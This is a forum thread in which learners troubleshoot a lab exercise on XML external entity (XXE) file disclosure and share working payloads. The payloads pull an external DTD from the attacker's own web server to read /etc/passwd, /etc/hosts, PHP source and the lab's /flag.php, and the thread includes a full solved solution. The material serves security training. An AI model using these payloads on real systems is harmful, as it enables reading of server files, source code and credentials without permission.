Have a Problem in XXE Advanced File Disclosure

Hello fam,
I am now having a problem in XXE Advanced File Disclosure!

The Lab Question: Use either method from this section to read the flag at ‘/flag.php’. (You may use the CDATA method at ‘/index.php’, or the error-based method at ‘/error’).

My Approach: So I tried CDATA Method as Follow -
I first make an xxe.dtd file with the contents <!ENTITY joined "%begin;%file;%end;"> in my host, after that start my webserver!

I go to the target ip website and start intercepting with burp. As expected, the request go through '/submitDetails.php' with POST Method. So I tried to alter the XML data to perform an XXE attack.

Attampt 1
I include the data,

<!DOCTYPE email [

  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->

  <!ENTITY % file SYSTEM "file:///etc/hosts"> <!-- reference external file -->

  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->

  <!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->

  %xxe;
]>
.
.
.
<email>&joined;</email>

which works as expected.

Sorry Had to delete the screenshot, as they don’t permit me as new user.

Attampt 2
So I tried for the core feature of CDATA, to get the source php code of submitDetails.php with the following payload.

<!DOCTYPE email [

  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->

  <!ENTITY % file SYSTEM "file:////var/www/html/submitDetails.php"> <!-- reference external file -->

  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->

  <!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->

  %xxe;
]>
.
.
.
<email>&joined;</email>

But this doen’t output anything as we expected.

Sorry Had to delete the screenshot, as they don’t permit me as new user.

Attempt 3
So I tried to check another one, this time another system file, which is /etc/passwd. Superisingly, this doesn’t work either [not like /etc/hosts which worked.].

Attempt 4
OK, I thought may be they limit the file permission or output limit, so I tried basic XXE like following.

<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

.
.
.

<email>&example;</email>

But guess what, this work.

Sorry Had to delete the screenshot, as they don’t permit me as new user.

Attempt 5
I have tried things that I know, but none didn’t work.
Bonus: So I tried to see what the question /flag.php looks like, but it returns a 404 Error, not a 302 or 500.
So I came here to ask for help. May be some glitch in the lab setup? or I am missing some important thing?

Thanks alot. Please Help me solve this puzzle.

Screenshot for attemp 1:

Screenshot for Attempt 2

Screenshot for Attempt 4

[SOLVED]
I research about CDATA all the way and try to alter the method a little. Now all my CDATA tags are in my server. The solution is as follow!
xxe.dtd

<!ENTITY % file SYSTEM "file:///flag.php">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents 
'%start;%file;%end;'>">

XML Payload

<!DOCTYPE email [
  <!ENTITY % dtd SYSTEM
  "http://10.10.16.10:8000/xxe.dtd">
  %dtd;
  %all;
]>
.
.
.
<email>
&fileContents;
</email>

Thank you, today I found out that researching and reading document is also a good practice when something doesn’t work out.

6 Likes

Thanks this is what I was missing out!

Hello all,

I’m stuck at this point. I was doing lot’s of things but it can’t work !!! I turn around for one week, seriously, wtf I loose my hair in this question… Could you help me because just for find the file flag.php it’s impossible… Or not but how can do it ?
Thanks

Hi guys,

Finaly it works but I think there are lots of prob with the VM… Because all I do today I was doing yesterday. So cool : it works !!! and I learn lots of things.
Thanks

Can someone help me please on this it doesnt work i tried everything . !!!

Its indeed tricky!

It was just repeating the module.
I think people are confused because /etc/passwd and /index.php etc are not being output.
Just run file:///etc/hosts, and once you can confirm it, run file:///flag.php.

<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///flag.php"> 
  <!ENTITY % end "]]>">
  <!ENTITY % xxe SYSTEM "http://10.10.x.x:8000/mal.dtd">
  %xxe;
]>


...
<email>&joined;</email>
<!ENTITY joined "%begin;%file;%end;">   <!-- mal.dtd -->

I struggled a lot with this task, and I want to share what I found.

  • < '!ENTITY % dtd SYSTEM “http://10.10.x.x:8000/xxe.dtd” >This code will be executed on “target/pwn machine” web server side. In case you write “localhost:8000” or any incorrect IP, it will be called on the web server side, and of course, the target web server doesn’t have anything on port:8000. Make sure to provide the correct IP address - tunnel IP between your PC and pwn machine which you established by OpenVpn. You can check IP by “ip add” or “ifconfig” commands

  • Even if you provided the correct IP, make sure that your firewall does not block incoming requests from the web server. In my case, it was UFWUncomplicated Firewall. Disable it shortly or allow incoming requests from the server by “sudo ufw disable” or "sudo ufw allow server_ip_address." Please refer to the official documentation of your firewall; improper configuration is a vulnerability.